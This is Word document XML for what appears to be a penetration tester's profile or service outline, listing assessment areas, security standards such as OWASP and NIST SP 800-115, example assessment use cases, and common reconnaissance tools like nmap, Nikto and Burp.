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C16" w:rsidRPr="0048619C" w:rsidRDefault="00C02ABC" w:rsidP="0087753C">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0048619C">
        <w:rPr>
          <w:rFonts w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Position: </w:t>
      </w:r>
      <w:r w:rsidR="006D6104" w:rsidRPr="0048619C">
        <w:rPr>
          <w:rFonts w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Senior Cyber Security Specialist – Penetration </w:t>
      </w:r>
      <w:r w:rsidR="00EA18ED" w:rsidRPr="0048619C">
        <w:rPr>
          <w:rFonts w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="006D6104" w:rsidRPr="0048619C">
        <w:rPr>
          <w:rFonts w:cs="Poppins"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ester</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1C16" w:rsidRDefault="001D1C16" w:rsidP="001D1C16">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00FB3B94" w:rsidRDefault="00FB3B94" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53EE3">
        <w:t>Areas</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1C16" w:rsidRPr="00FB3B94" w:rsidRDefault="001D1C16" w:rsidP="00FB3B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3B94">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1C16" w:rsidRPr="00FB3B94" w:rsidRDefault="001D1C16" w:rsidP="00FB3B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3B94">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web application and application security assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001D1C16" w:rsidRPr="00FB3B94" w:rsidRDefault="001D1C16" w:rsidP="00FB3B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3B94">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Network security assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0082773C" w:rsidRDefault="001D1C16" w:rsidP="00FB3B94">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FB3B94">
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability assessment.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB014A" w:rsidRDefault="00EB014A" w:rsidP="00EB014A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00EB014A" w:rsidRDefault="003D6DB3" w:rsidP="00EB014A">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Global </w:t>
      </w:r>
      <w:r w:rsidR="00EB014A">
        <w:t>Standards</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB014A" w:rsidRDefault="00EB014A" w:rsidP="00EB014A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>OWASP 2017 top 10</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB014A" w:rsidRDefault="00986BDA" w:rsidP="00EB014A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>CIS</w:t>
      </w:r>
      <w:r w:rsidR="00F1446B">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00D72EC7">
        <w:t>(Center for Internet Security)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Top</w:t>
      </w:r>
      <w:r w:rsidR="00E74A04">
        <w:t xml:space="preserve"> 20</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Critical Security Controls</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F1446B" w:rsidRPr="00C936AF" w:rsidRDefault="00C936AF" w:rsidP="00EB014A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C936AF">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:iCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:bidi="he-IL"/>
        </w:rPr>
        <w:t>Pentest Execution Standard</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C936AF" w:rsidRDefault="00C936AF" w:rsidP="00EB014A">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Web Application Penetration testing - OWASP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C936AF" w:rsidRDefault="00C936AF" w:rsidP="00C936AF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00C936AF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NIST SP 800-115, Technical Guide to Information Security Testing and Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A846D5" w:rsidRPr="00C936AF" w:rsidRDefault="00A846D5" w:rsidP="00A846D5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="25"/>
        </w:numPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00A846D5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NIST_SP_800-30rv1_Guide for Conducting Risk Assessments</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Appendix I</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00EB014A" w:rsidRPr="00EB014A" w:rsidRDefault="00EB014A" w:rsidP="00EB014A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:t>Some Example Infrastructure Security Assessment Use cases</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Asset Discovery Scans</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Effectiveness of Asset Management and Change Control (Policy) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Vulnerability Assessment Scan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="9"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Effectiveness of Patching Policy Control (Policy) </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Network Segmentation Control Testing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Phishing Simulation Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Egress Control Assessment</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Penetration Test </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Verify Implementation of Controls </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="8"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Measure response against real-world attacker. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F957BF" w:rsidRPr="00BF32E3" w:rsidRDefault="00F957BF" w:rsidP="00F957BF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00BF32E3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Red Team Assessment (End to end )</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00BB394F" w:rsidRDefault="00BB394F" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E2F69" w:rsidRDefault="003E2F69" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E2F69" w:rsidRDefault="003E2F69" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E2F69" w:rsidRDefault="003E2F69" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003E2F69" w:rsidRDefault="003E2F69" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Segoe UI"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00E53EE3" w:rsidRDefault="00E53EE3" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00E53EE3">
        <w:lastRenderedPageBreak/>
        <w:t>Infrastructure Reconnaissance</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00E53EE3" w:rsidRDefault="002111AF" w:rsidP="002111AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53EE3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Passive</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00DE39C5" w:rsidRDefault="002111AF" w:rsidP="00DE39C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00DE39C5" w:rsidRDefault="002111AF" w:rsidP="00DE39C5">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Responder [Analyze] Mode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00D537AF" w:rsidRDefault="002111AF" w:rsidP="002111AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00E53EE3" w:rsidRDefault="002111AF" w:rsidP="002111AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53EE3">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:b/>
        </w:rPr>
        <w:t>Active</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00DE39C5" w:rsidRDefault="002111AF" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00DE39C5" w:rsidRDefault="002111AF" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>dig</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00DE39C5" w:rsidRDefault="002111AF" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Dns-brute</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="00DE39C5" w:rsidRDefault="002111AF" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:spacing w:after="64"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>joomscan</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002111AF" w:rsidRPr="008C75BB" w:rsidRDefault="002111AF" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00DE39C5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Dirb</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C75BB" w:rsidRPr="008C75BB" w:rsidRDefault="008C75BB" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Nikto</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C75BB" w:rsidRPr="008C75BB" w:rsidRDefault="008C75BB" w:rsidP="00D537AF">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Burp or OWASPZAP</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C75BB" w:rsidRDefault="008C75BB" w:rsidP="008C75BB">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="003D61F5" w:rsidRDefault="003D61F5" w:rsidP="008C75BB">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E6850" w:rsidRDefault="005E6850" w:rsidP="008C75BB">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:ind w:left="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="005E6850" w:rsidRDefault="005E6850" w:rsidP="000300B0">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006B6927" w:rsidRPr="006B6927" w:rsidRDefault="006B6927" w:rsidP="00D106F0">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="006B6927">
        <w:t>Penetration Testing</w:t>
      </w:r>
